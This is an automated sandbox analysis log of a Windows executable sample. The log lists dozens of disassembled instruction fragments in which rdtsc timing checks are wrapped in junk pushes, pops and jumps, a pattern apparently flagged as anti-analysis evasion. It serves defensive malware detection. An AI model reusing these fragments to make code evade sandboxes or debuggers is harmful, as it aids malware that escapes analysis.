Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD3B70 second address: CD3B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CD931A second address: CD933A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD13D06371Eh 0x0000000f jl 00007FD13D063716h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDCF2F second address: CDCF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDCF33 second address: CDCF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD13D06371Ch 0x0000000c je 00007FD13D063716h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDCF49 second address: CDCF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDC109 second address: CDC10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDC3E2 second address: CDC3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD13CB4AEF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDC3ED second address: CDC409 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD13D063727h 0x00000008 js 00007FD13D063716h 0x0000000e jmp 00007FD13D06371Bh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDC68B second address: CDC691 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDC691 second address: CDC6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13D06371Ch 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FD13D06371Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDC6B3 second address: CDC6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDCABF second address: CDCAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDCAC3 second address: CDCAE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FD13CB4AF02h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CDCC6B second address: CDCC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD13D063716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE6D25 second address: CE6D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE56DA second address: CE56F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD13D063728h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE56F9 second address: CE56FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE582B second address: CE5831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE5831 second address: CE5844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FD13CB4AEF6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE5844 second address: CE5893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FD13D06371Ch 0x00000011 jng 00007FD13D063716h 0x00000017 popad 0x00000018 pushad 0x00000019 jng 00007FD13D06372Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE5893 second address: CE589D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD13CB4AEF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE5B8E second address: CE5BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD13D063727h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE5D18 second address: CE5D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE4A1A second address: CE4A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FD13D063716h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CE9234 second address: CE9240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FD13CB4AEF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CEEA59 second address: CEEA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD13D063726h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CEEA73 second address: CEEA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C40471 second address: C40475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CF1615 second address: CF161B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CF305B second address: CF3068 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CF3068 second address: CF306F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D08E57 second address: D08E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D08E5E second address: D08E90 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD13CB4AEFCh 0x00000008 js 00007FD13CB4AEF6h 0x0000000e jmp 00007FD13CB4AEFFh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 jl 00007FD13CB4AEF6h 0x0000001e pop eax 0x0000001f pushad 0x00000020 jng 00007FD13CB4AEF6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D08E90 second address: D08E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D08E96 second address: D08E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D10430 second address: D10448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13D06371Bh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007FD13D063716h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D10448 second address: D10466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD13CB4AF05h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D10466 second address: D10481 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FD13D063739h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD13D06371Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D172D3 second address: D172DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD13CB4AEF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D172DF second address: D172E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D17460 second address: D17464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D175C1 second address: D175DF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD13D063720h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D175DF second address: D175F3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FD13CB4AEF6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D178CA second address: D178D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D56F72 second address: D56F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D56F78 second address: D56F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D56F7C second address: D56F9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FD13CB4AEF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD13CB4AF02h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D56F9C second address: D56FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D56FA2 second address: D56FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13CB4AF03h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD13CB4AF07h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D59AC9 second address: D59AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13D063724h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D59AE3 second address: D59B05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD13CB4AF07h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D6C7AC second address: D6C7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jl 00007FD13D063716h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D6C7BC second address: D6C7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D6C64F second address: D6C66D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD13D063729h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D6F3A5 second address: D6F3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D6F3AE second address: D6F3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: D6F3B2 second address: D6F3C9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d jg 00007FD13CB4AEF6h 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E38EEC second address: E38F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13D063726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3D64E second address: E3D652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3D652 second address: E3D65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3D65A second address: E3D685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD13CB4AF03h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007FD13CB4AEF8h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3D685 second address: E3D68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CABB second address: E3CAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FD13CB4AF05h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CAD8 second address: E3CADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CADE second address: E3CAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD13CB4AEF6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c jnp 00007FD13CB4AF10h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007FD13CB4AEF6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CAFA second address: E3CB05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CE05 second address: E3CE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CE09 second address: E3CE3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FD13D063728h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CE3B second address: E3CE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD13CB4AEFDh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jng 00007FD13CB4AEF6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CE59 second address: E3CE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD13D063716h 0x0000000a jnc 00007FD13D063716h 0x00000010 popad 0x00000011 push ebx 0x00000012 jne 00007FD13D063716h 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CE72 second address: E3CE79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E3CFB8 second address: E3CFD3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FD13D063716h 0x00000011 jnl 00007FD13D063716h 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E400B5 second address: E400BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E400BA second address: E400C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E4335A second address: E4337F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD13CB4AF01h 0x0000000c jmp 00007FD13CB4AEFBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E4337F second address: E43385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: E44D22 second address: E44D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140035 second address: 7140066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD13D06371Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD13D06371Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140066 second address: 71400BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov dl, C3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD13CB4AF04h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov cx, 4CADh 0x00000018 popad 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f jmp 00007FD13CB4AEFFh 0x00000024 sub esp, 18h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD13CB4AF05h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71400BD second address: 71400E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 60F2h 0x00000007 mov edx, 6FC29A3Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD13D063721h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71400E0 second address: 71400F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71400F2 second address: 71400F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71400F6 second address: 71400FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71400FC second address: 714016E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push ecx 0x00000015 jmp 00007FD13D063720h 0x0000001a mov dword ptr [esp], esi 0x0000001d pushad 0x0000001e mov di, cx 0x00000021 mov cx, 8909h 0x00000025 popad 0x00000026 mov esi, dword ptr [74E806ECh] 0x0000002c jmp 00007FD13D063724h 0x00000031 test esi, esi 0x00000033 pushad 0x00000034 call 00007FD13D06371Eh 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714016E second address: 7140186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007FD13CB4AF01h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140186 second address: 71401BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jne 00007FD13D064639h 0x0000000c jmp 00007FD13D06371Dh 0x00000011 xchg eax, edi 0x00000012 jmp 00007FD13D06371Eh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD13D06371Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71401BF second address: 71401D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AEFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71401D1 second address: 71401D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71402A1 second address: 71402A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71402A5 second address: 71402BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
